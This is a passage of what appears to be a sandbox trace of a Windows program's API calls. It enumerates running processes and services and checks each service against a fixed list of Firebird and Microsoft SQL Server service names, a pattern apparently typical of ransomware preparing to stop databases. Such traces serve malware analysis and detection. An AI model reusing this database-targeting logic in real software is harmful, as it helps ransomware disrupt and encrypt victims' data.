lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0049.789] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0049.789] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0049.790] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0049.790] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0049.790] lstrlenW (lpString="msoia.exe") returned 9 [0049.790] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0049.791] lstrlenW (lpString="msoia.exe") returned 9 [0049.791] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0049.792] lstrlenW (lpString="AppHostRegistrationVerifier.exe") returned 31 [0049.792] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="screensaver.exe")) returned 1 [0049.889] lstrlenW (lpString="screensaver.exe") returned 15 [0049.889] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="xml upper.exe")) returned 1 [0049.889] lstrlenW (lpString="xml upper.exe") returned 13 [0049.889] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="defeat preston.exe")) returned 1 [0049.890] lstrlenW (lpString="defeat preston.exe") returned 18 [0049.890] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="boss isolated.exe")) returned 1 [0049.891] lstrlenW (lpString="boss isolated.exe") returned 17 [0049.891] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0049.891] lstrlenW (lpString="member.exe") returned 10 [0049.891] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="chubby-er.exe")) returned 1 [0049.892] lstrlenW (lpString="chubby-er.exe") returned 13 [0049.892] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="forgotten awareness anymore.exe")) returned 1 [0049.893] lstrlenW (lpString="forgotten awareness anymore.exe") returned 31 [0049.893] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="organization.exe")) returned 1 [0049.893] lstrlenW (lpString="organization.exe") returned 16 [0049.893] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="citizenship_surfaces_neil.exe")) returned 1 [0049.894] lstrlenW (lpString="citizenship_surfaces_neil.exe") returned 29 [0049.894] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="spray-roman.exe")) returned 1 [0049.895] lstrlenW (lpString="spray-roman.exe") returned 15 [0049.895] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x654, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="elementary-east-examined.exe")) returned 1 [0049.896] lstrlenW (lpString="elementary-east-examined.exe") returned 28 [0049.896] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x784, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="tank attacks.exe")) returned 1 [0049.897] lstrlenW (lpString="tank attacks.exe") returned 16 [0049.897] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="wires jacket.exe")) returned 1 [0049.897] lstrlenW (lpString="wires jacket.exe") returned 16 [0049.898] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="values.exe")) returned 1 [0049.898] lstrlenW (lpString="values.exe") returned 10 [0049.898] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="rebecca mid developer.exe")) returned 1 [0049.899] lstrlenW (lpString="rebecca mid developer.exe") returned 25 [0049.899] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="printersaerospace.exe")) returned 1 [0049.900] lstrlenW (lpString="printersaerospace.exe") returned 21 [0049.900] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="defects_burning_rank.exe")) returned 1 [0049.901] lstrlenW (lpString="defects_burning_rank.exe") returned 24 [0049.901] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0049.901] lstrlenW (lpString="dllhost.exe") returned 11 [0049.901] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="joke.exe")) returned 1 [0049.902] lstrlenW (lpString="joke.exe") returned 8 [0049.902] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="dim-hindu-customize.exe")) returned 1 [0049.903] lstrlenW (lpString="dim-hindu-customize.exe") returned 23 [0049.903] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="documents.exe")) returned 1 [0049.904] lstrlenW (lpString="documents.exe") returned 13 [0049.904] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="rebel.exe")) returned 1 [0049.905] lstrlenW (lpString="rebel.exe") returned 9 [0049.905] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="arbor-tutorials-lawyers.exe")) returned 1 [0049.906] lstrlenW (lpString="arbor-tutorials-lawyers.exe") returned 27 [0049.906] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfc8, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0049.906] lstrlenW (lpString="conhost.exe") returned 11 [0049.906] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfb0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0049.907] lstrlenW (lpString="conhost.exe") returned 11 [0049.907] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0049.908] lstrlenW (lpString="hgaibc.exe") returned 10 [0049.908] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xe0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0049.908] lstrlenW (lpString="cmd.exe") returned 7 [0049.908] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0049.909] lstrlenW (lpString="CompatTelRunner.exe") returned 19 [0049.909] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf8c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0049.910] lstrlenW (lpString="conhost.exe") returned 11 [0049.910] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x658, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf48, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0049.911] lstrlenW (lpString="conhost.exe") returned 11 [0049.911] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.911] lstrlenW (lpString="svchost.exe") returned 11 [0049.911] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0049.912] CloseHandle (hObject=0x324) returned 1 [0049.912] Sleep (dwMilliseconds=0x1f4) [0050.918] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x60ea98 [0050.918] EnumServicesStatusExW (in: hSCManager=0x60ea98, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0) returned 0 [0050.919] GetLastError () returned 0xea [0050.919] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1ce8) returned 0x636198 [0050.919] EnumServicesStatusExW (in: hSCManager=0x60ea98, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x636198, cbBufSize=0x1ce8, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x636198, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0) returned 1 [0050.920] CloseServiceHandle (hSCObject=0x60ea98) returned 1 [0050.920] lstrlenW (lpString="Appinfo") returned 7 [0050.920] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0050.920] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0050.920] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0050.920] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0050.920] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0050.920] lstrlenW (lpString="AppXSvc") returned 7 [0050.920] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0050.920] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0050.920] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0050.920] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0050.920] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0050.920] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0050.920] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0050.920] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0050.920] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0050.920] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0050.920] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0050.920] lstrlenW (lpString="Audiosrv") returned 8 [0050.920] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0050.920] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0050.920] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0050.920] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0050.920] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0050.920] lstrlenW (lpString="BFE") returned 3 [0050.921] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0050.921] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0050.921] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0050.921] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0050.921] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0050.921] lstrlenW (lpString="BITS") returned 4 [0050.921] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0050.921] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0050.921] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0050.921] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0050.921] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0050.921] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0050.921] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0050.921] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0050.921] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0050.921] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0050.921] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0050.921] lstrlenW (lpString="CDPSvc") returned 6 [0050.921] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0050.921] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0050.921] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0050.921] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0050.921] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0050.921] lstrlenW (lpString="ClickToRunSvc") returned 13 [0050.921] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0050.921] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0050.921] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0050.921] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0050.921] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0050.921] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0050.921] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0050.921] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0050.921] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0050.921] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0050.921] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0050.921] lstrlenW (lpString="CryptSvc") returned 8 [0050.922] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0050.922] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0050.922] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0050.922] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0050.922] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0050.922] lstrlenW (lpString="DcomLaunch") returned 10 [0050.922] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0050.922] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0050.922] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0050.922] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0050.922] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0050.922] lstrlenW (lpString="DeviceAssociationService") returned 24 [0050.922] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0050.922] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0050.922] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0050.922] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0050.922] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0050.922] lstrlenW (lpString="Dhcp") returned 4 [0050.922] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0050.922] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0050.922] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0050.922] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0050.922] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0050.922] lstrlenW (lpString="Dnscache") returned 8 [0050.922] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0050.922] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0050.922] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0050.922] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0050.922] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0050.922] lstrlenW (lpString="DoSvc") returned 5 [0050.922] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0050.922] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0050.923] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0050.923] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0050.923] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0050.923] lstrlenW (lpString="DPS") returned 3 [0050.923] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0050.923] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0050.923] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0050.923] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0050.923] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0050.923] lstrlenW (lpString="DusmSvc") returned 7 [0050.923] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0050.923] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0050.923] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0050.923] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0050.923] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0050.923] lstrlenW (lpString="EventLog") returned 8 [0050.923] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0050.923] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0050.923] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0050.923] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0050.923] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0050.923] lstrlenW (lpString="EventSystem") returned 11 [0050.923] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0050.923] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0050.923] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0050.923] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0050.923] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0050.923] lstrlenW (lpString="FontCache") returned 9 [0050.923] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0050.923] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0050.923] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0050.923] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0050.923] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0050.923] lstrlenW (lpString="gpsvc") returned 5 [0050.923] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0050.923] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0050.924] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0050.924] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0050.924] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0050.924] lstrlenW (lpString="iphlpsvc") returned 8 [0050.924] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0050.924] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0050.924] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0050.924] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0050.924] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0050.924] lstrlenW (lpString="KeyIso") returned 6 [0050.924] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0050.924] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0050.924] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0050.924] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0050.924] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0050.924] lstrlenW (lpString="LanmanServer") returned 12 [0050.924] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0050.924] 